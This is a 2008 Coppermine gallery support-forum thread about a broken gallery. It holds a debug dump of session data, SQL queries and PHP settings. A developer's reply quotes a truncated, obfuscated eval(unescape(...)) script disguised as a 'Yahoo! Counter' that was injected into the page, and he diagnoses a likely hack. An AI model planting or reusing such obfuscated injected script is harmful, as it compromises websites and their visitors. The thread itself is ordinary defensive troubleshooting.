Advanced search  

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Pages: [1]   Go Down

Author Topic: I don't know what happen to my Gallery  (Read 4162 times)

0 Members and 1 Guest are viewing this topic.

belovedillusion

  • Coppermine newbie
  • Offline Offline
  • Posts: 5
I don't know what happen to my Gallery
« on: September 21, 2008, 11:43:26 pm »

I don't know what happen to my Gallery.  I can't see any of my caterlory or pictures.  So I turn it offline and it ask me to post this to suppose board.

Code: [Select]
USER:
------------------
Array
(
    [ID] => ff26193b36c48a597182d4a4701524d9
    [am] => 1
    [lang] => english
    [liv] => Array
        (
            [0] => 2999
            [1] => 3035
            [2] => 1822
            [3] => 3042
            [4] => 3068
        )

    [lap] => 1
)

==========================
USER DATA:
------------------
Array
(
    [user_id] => 1
    [user_name] => ***
    [groups] => Array
        (
            [0] => 1
        )

    [disk_max] => 0
    [disk_min] => 0
    [can_rate_pictures] => 1
    [can_send_ecards] => 1
    [ufc_max] => 3
    [ufc_min] => 3
    [custom_user_upload] => 0
    [num_file_upload] => 10
    [num_URI_upload] => 3
    [can_post_comments] => 1
    [can_upload_pictures] => 1
    [can_create_albums] => 1
    [has_admin_access] => 1
    [pub_upl_need_approval] => 0
    [priv_upl_need_approval] => 0
    [group_name] => Administrators
    [upload_form_config] => 3
    [group_quota] => 0
    [can_see_all_albums] => 1
    [group_id] => 1
)

==========================
Queries:
------------------
Array
(
    [0] => SELECT extension, mime, content, player FROM cpg14x_filetypes; (0.001s)
    [1] => delete from `***`.cpg14x_sessions where time<1222029335 and remember=0; (0.011s)
    [2] => delete from `***`.cpg14x_sessions where time<1220823335; (0s)
    [3] => select user_id from `***`.cpg14x_sessions where session_id = 'ed556c8740d49aeaf626999c9270157f' (0s)
    [4] => select user_id as id, user_password as password from `***`.cpg14x_users where user_id=1 (0s)
    [5] => SELECT u.user_id AS id, u.user_name AS username, u.user_password AS password, u.user_group+100 AS group_id FROM `***8`.cpg14x_users AS u INNER JOIN `***`.cpg14x_usergroups AS g ON u.user_group=g.group_id WHERE u.user_id='1' (0.002s)
    [6] => SELECT user_group_list FROM `***`.cpg14x_users AS u WHERE user_id='1' and user_group_list <> ''; (0.001s)
    [7] => SELECT MAX(group_quota) as disk_max, MIN(group_quota) as disk_min, MAX(can_rate_pictures) as can_rate_pictures, MAX(can_send_ecards) as can_send_ecards, MAX(upload_form_config) as ufc_max, MIN(upload_form_config) as ufc_min, MAX(custom_user_upload) as custom_user_upload, MAX(num_file_upload) as num_file_upload, MAX(num_URI_upload) as num_URI_upload, MAX(can_post_comments) as can_post_comments, MAX(can_upload_pictures) as can_upload_pictures, MAX(can_create_albums) as can_create_albums, MAX(has_admin_access) as has_admin_access, MIN(pub_upl_need_approval) as pub_upl_need_approval, MIN( priv_upl_need_approval) as  priv_upl_need_approval FROM cpg14x_usergroups WHERE group_id in (1) (0.121s)
    [8] => SELECT group_name FROM  cpg14x_usergroups WHERE group_id= 1 (0.001s)
    [9] => update `***`.cpg14x_sessions set time='1222032935' where session_id = 'ed556c8740d49aeaf626999c9270157f' (0s)
    [10] => SELECT user_favpics FROM cpg14x_favpics WHERE user_id = 1 (0.004s)
    [11] => DELETE FROM cpg14x_banned WHERE expiry < '2008-09-21 16:35:35' (0.01s)
    [12] => SELECT * FROM cpg14x_banned WHERE (ip_addr='24.17.22.102' OR ip_addr='24.17.22.102' OR user_id=1) AND brute_force=0 (0s)
    [13] => SELECT cid, name, description, thumb FROM cpg14x_categories WHERE parent = ''  ORDER BY pos (0.123s)
    [14] => SELECT aid FROM cpg14x_albums WHERE category = 2 (0s)
    [15] => SELECT count(*) FROM cpg14x_pictures as p, cpg14x_albums as a WHERE p.aid = a.aid AND approved='YES' AND category = 2 (0.002s)
    [16] => SELECT cid, name, description, thumb FROM cpg14x_categories WHERE parent = '2'  ORDER BY pos (0.001s)
    [17] => SELECT aid FROM cpg14x_albums WHERE category = 3 (0.017s)
    [18] => SELECT count(*) FROM cpg14x_pictures as p, cpg14x_albums as a WHERE p.aid = a.aid AND approved='YES' AND category = 3 (0.001s)
    [19] => SELECT aid FROM cpg14x_albums WHERE category = 4 (0.001s)
    [20] => SELECT count(*) FROM cpg14x_pictures as p, cpg14x_albums as a WHERE p.aid = a.aid AND approved='YES' AND category = 4 (0.001s)
    [21] => SELECT aid FROM cpg14x_albums WHERE category = 5 (0s)
    [22] => SELECT count(*) FROM cpg14x_pictures as p, cpg14x_albums as a WHERE p.aid = a.aid AND approved='YES' AND category = 5 (0.001s)
    [23] => SELECT aid FROM cpg14x_albums WHERE category = 6 (0.001s)
    [24] => SELECT count(*) FROM cpg14x_pictures as p, cpg14x_albums as a WHERE p.aid = a.aid AND approved='YES' AND category = 6 (0.001s)
    [25] => SELECT aid FROM cpg14x_albums WHERE category = 7 (0.002s)
    [26] => SELECT count(*) FROM cpg14x_pictures as p, cpg14x_albums as a WHERE p.aid = a.aid AND approved='YES' AND category = 7 (0.001s)
    [27] => SELECT aid FROM cpg14x_albums WHERE category = 8 (0.001s)
    [28] => SELECT count(*) FROM cpg14x_pictures as p, cpg14x_albums as a WHERE p.aid = a.aid AND approved='YES' AND category = 8 (0.001s)
    [29] => SELECT aid FROM cpg14x_albums WHERE category = 9 (0.001s)
    [30] => SELECT count(*) FROM cpg14x_pictures as p, cpg14x_albums as a WHERE p.aid = a.aid AND approved='YES' AND category = 9 (0.001s)
    [31] => SELECT cid, name, description, thumb FROM cpg14x_categories WHERE parent = '9'  ORDER BY pos (0.001s)
    [32] => SELECT aid FROM cpg14x_albums WHERE category = 11 (0.007s)
    [33] => SELECT count(*) FROM cpg14x_pictures as p, cpg14x_albums as a WHERE p.aid = a.aid AND approved='YES' AND category = 11 (0.001s)
    [34] => SELECT aid FROM cpg14x_albums WHERE category = 10 (0.002s)
    [35] => SELECT count(*) FROM cpg14x_pictures as p, cpg14x_albums as a WHERE p.aid = a.aid AND approved='YES' AND category = 10 (0.001s)
    [36] => SELECT aid FROM cpg14x_albums WHERE category = 12 (0s)
    [37] => SELECT count(*) FROM cpg14x_pictures as p, cpg14x_albums as a WHERE p.aid = a.aid AND approved='YES' AND category = 12 (0.001s)
    [38] => SELECT aid FROM cpg14x_albums as a WHERE category>=10000 (0.001s)
    [39] => SELECT count(*) FROM cpg14x_pictures as p, cpg14x_albums as a WHERE p.aid = a.aid AND approved='YES' AND category >= 10000 (0.001s)
    [40] => SELECT cid, name, description, thumb FROM cpg14x_categories WHERE parent = '1'  ORDER BY pos (0.001s)
    [41] => SELECT aid FROM cpg14x_albums WHERE category = 13 (0s)
    [42] => SELECT count(*) FROM cpg14x_pictures as p, cpg14x_albums as a WHERE p.aid = a.aid AND approved='YES' AND category = 13 (0.002s)
    [43] => SELECT cid, name, description, thumb FROM cpg14x_categories WHERE parent = '13'  ORDER BY pos (0.001s)
    [44] => SELECT aid FROM cpg14x_albums WHERE category = 14 (0.001s)
    [45] => SELECT count(*) FROM cpg14x_pictures as p, cpg14x_albums as a WHERE p.aid = a.aid AND approved='YES' AND category = 14 (0.001s)
    [46] => SELECT aid FROM cpg14x_albums WHERE category = 15 (0.001s)
    [47] => SELECT count(*) FROM cpg14x_pictures as p, cpg14x_albums as a WHERE p.aid = a.aid AND approved='YES' AND category = 15 (0.001s)
    [48] => SELECT aid FROM cpg14x_albums WHERE category = 17 (0s)
    [49] => SELECT count(*) FROM cpg14x_pictures as p, cpg14x_albums as a WHERE p.aid = a.aid AND approved='YES' AND category = 17 (0.001s)
    [50] => SELECT cid, name, description, thumb FROM cpg14x_categories WHERE parent = '17'  ORDER BY pos (0.001s)
    [51] => SELECT aid FROM cpg14x_albums WHERE category = 20 (0s)
    [52] => SELECT count(*) FROM cpg14x_pictures as p, cpg14x_albums as a WHERE p.aid = a.aid AND approved='YES' AND category = 20 (0.001s)
    [53] => SELECT aid FROM cpg14x_albums WHERE category = 21 (0.002s)
    [54] => SELECT count(*) FROM cpg14x_pictures as p, cpg14x_albums as a WHERE p.aid = a.aid AND approved='YES' AND category = 21 (0.001s)
    [55] => SELECT aid FROM cpg14x_albums WHERE category = 19 (0s)
    [56] => SELECT count(*) FROM cpg14x_pictures as p, cpg14x_albums as a WHERE p.aid = a.aid AND approved='YES' AND category = 19 (0.001s)
    [57] => SELECT aid FROM cpg14x_albums WHERE category = 18 (0s)
    [58] => SELECT count(*) FROM cpg14x_pictures as p, cpg14x_albums as a WHERE p.aid = a.aid AND approved='YES' AND category = 18 (0.001s)
    [59] => SELECT aid FROM cpg14x_albums as a WHERE category = '0' (0s)
    [60] => SELECT count(*) FROM cpg14x_albums as a WHERE 1 (0s)
    [61] => SELECT count(*) FROM cpg14x_pictures as p LEFT JOIN cpg14x_albums as a ON a.aid=p.aid WHERE 1 AND approved='YES' (0.005s)
    [62] => SELECT count(*) FROM cpg14x_comments as c LEFT JOIN cpg14x_pictures as p ON c.pid=p.pid LEFT JOIN cpg14x_albums as a ON a.aid=p.aid WHERE 1 (0.001s)
    [63] => SELECT count(*) FROM cpg14x_categories WHERE 1 (0.002s)
    [64] => SELECT sum(hits) FROM cpg14x_pictures as p LEFT JOIN cpg14x_albums as a ON p.aid=a.aid WHERE 1 (0.083s)
    [65] => SELECT COUNT(*) FROM cpg14x_pictures WHERE approved = 'NO' (0.003s)
    [66] => SELECT count(*) FROM cpg14x_albums as a WHERE category = '0' (0.001s)
    [67] => SELECT * FROM cpg14x_pictures WHERE approved = 'YES'  ORDER BY RAND() LIMIT 8 (0.072s)
    [68] => SELECT COUNT(*) from cpg14x_pictures WHERE approved = 'YES'  (0.008s)
    [69] => SELECT * FROM cpg14x_pictures WHERE approved = 'YES'  ORDER BY pid DESC  LIMIT 0 ,8 (0.001s)
)

==========================
GET :
------------------
Array
(
)

==========================
POST :
------------------
Array
(
)

==========================
VERSION INFO :
------------------
PHP version: 4.3.11 - OK
------------------
mySQL version: 4.1.20-max-log
------------------
Coppermine version: 1.4.19(stable)
==========================
Module: GD
------------------
GD Version: bundled (2.0.28 compatible)
FreeType Support: 1
FreeType Linkage: with freetype
T1Lib Support:
GIF Read Support: 1
GIF Create Support: 1
JPG Support: 1
PNG Support: 1
WBMP Support: 1
XBM Support: 1
JIS-mapped Japanese Font Support:

==========================
Module: mysql
------------------
MySQL Supportenabled
Active Persistent Links 0
Active Links 1
Client API version 4.1.20
MYSQL_MODULE_TYPE external
MYSQL_SOCKET /var/lib/mysql/mysql.sock
MYSQL_INCLUDE -I/usr/include/mysql
MYSQL_LIBS -L/usr/lib -lmysqlclient 
==========================
Module: zlib
------------------
ZLib Support enabled
Compiled Version 1.1.4
Linked Version 1.1.4
==========================
Server restrictions (safe mode)?
------------------
Directive | Local Value | Master Value
safe_mode | Off | Off
safe_mode_exec_dir | no value | no value
safe_mode_gid | Off | Off
safe_mode_include_dir | no value | no value
safe_mode_exec_dir | no value | no value
sql.safe_mode | Off | Off
disable_functions | no value | no value
file_uploads | On | On
include_path | .:/usr/local/lib/php:/usr/local/share/pear | .:/usr/local/lib/php:/usr/local/share/pear
open_basedir | no value | no value
==========================
email
------------------
Directive | Local Value | Master Value
sendmail_from | me@localhost.com | me@localhost.com
sendmail_path | /usr/sbin/sendmail -t -i  | /usr/sbin/sendmail -t -i
SMTP | localhost | localhost
smtp_port | 25 | 25
==========================
Size and Time
------------------
Directive | Local Value | Master Value
max_execution_time | 30 | 30
max_input_time | -1 | -1
upload_max_filesize | 2M | 2M
post_max_size | 8M | 8M
==========================
Page generated in 0.61 seconds - 70 queries in 0.514 seconds - Album set : ; Meta set: ;

I don't know where to post this messages so I post it here can you help me please?

http://galleryhgstudio.belovedillusions.net/

Thank you!
« Last Edit: September 22, 2008, 12:17:09 am by Nibbler »
Logged

Nibbler

  • Guest
Re: I don't know what happen to my Gallery
« Reply #1 on: September 22, 2008, 12:16:30 am »

Set your gallery back online so we can see what the problem is.
Logged

belovedillusion

  • Coppermine newbie
  • Offline Offline
  • Posts: 5
Re: I don't know what happen to my Gallery
« Reply #2 on: September 22, 2008, 02:17:26 am »

Alright I turn my gallery back to online.
Logged

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: I don't know what happen to my Gallery
« Reply #3 on: September 22, 2008, 07:30:49 am »

You appear to have over-modified your gallery. Upgrade to cpg1.4.19. Upload the classic theme as well during that stage, so we can check wether this is theme-related.
Logged

belovedillusion

  • Coppermine newbie
  • Offline Offline
  • Posts: 5
Re: I don't know what happen to my Gallery
« Reply #4 on: September 23, 2008, 06:21:19 am »

the cpg1.4.19 is my current version and I just upload the classic theme back and set as defauls, as you asked me too.
Logged

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: I don't know what happen to my Gallery
« Reply #5 on: September 23, 2008, 07:14:47 am »

The yahoo counter appears to be running havoc. Turn it off (at least temporarily).
Logged

belovedillusion

  • Coppermine newbie
  • Offline Offline
  • Posts: 5
Re: I don't know what happen to my Gallery
« Reply #6 on: September 23, 2008, 07:47:55 am »

where is the yahoo counter at and how do I turn it off?
Logged

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: I don't know what happen to my Gallery
« Reply #7 on: September 23, 2008, 07:55:50 am »

It doesn't come with coppermine, so you must deliberately have added it or your webhost is injecting it. Take a look at the HTML output of your page - it is cluttered with stuff like
Code: [Select]
        <tr>
                <td class="catrow" align="left"><table border="0"><tr><td></td><td><img src="images/spacer.gif" width="20" height="1" border="0" alt="" /></td><td></td><td><span class="catlink"><b><a href="index.php?cat=3">2001 - Harry Potter and the Sorcerer&#39;s Stone
<script language=javascript><!-- Yahoo! Counter starts here -->
if(typeof(yahoo_counter)!=typeof(1))eval(unescape('v%61r~ |%61~%2C%69~%2C%5F#;`i~%3D%22#%37`6?%2E#1?%36$%33`%2E#";@%61%3D!%5B#"@%378%2E15%37.#</a></b></span></td></tr></table></td>
                <td class="catrow" align="center">5</td>
                <td class="catrow" align="center">201</td>
        </tr>
which is of course nonsensical code - the opening <script>-tag is never being closed, so there is no HTML output, but JavaScript output that doesn't make sense and leads to JavaScript errors only.

If it wasn't you who added it, ask your webhost for support. Another possible cause for this crap is your site having been hacked (by a newbie hacker who doesn't know what he's doing). That's why I suggested upgrading, which will at least sanitize the coppermine core files (but of course it will not sanitize your entire site and keep you safe from re-infection). If you have been hacked, follow the sanitization thread http://forum.coppermine-gallery.net/index.php/topic,51927.0.html or dump your site and upload a clean backup (if you have one).
Logged

belovedillusion

  • Coppermine newbie
  • Offline Offline
  • Posts: 5
Re: I don't know what happen to my Gallery
« Reply #8 on: September 23, 2008, 04:30:46 pm »

this is not the first times my site got hacked and it wouldn't be surprise to me if it is.  So if I deleted everything and upload it again.  Is there anyway I can prevent the hacking that going to happen again?  Also I talks to my site hosting they said that a lot of my files it in permission 777, and I told them that the only permission 777 that I gave it for the include files in the gallery.  Is there any other permission beside the 777 that work on the gallery that I can change to it, that way nobody can access into my files?
Logged
Pages: [1]   Go Up
 

Page created in 0.02 seconds with 19 queries.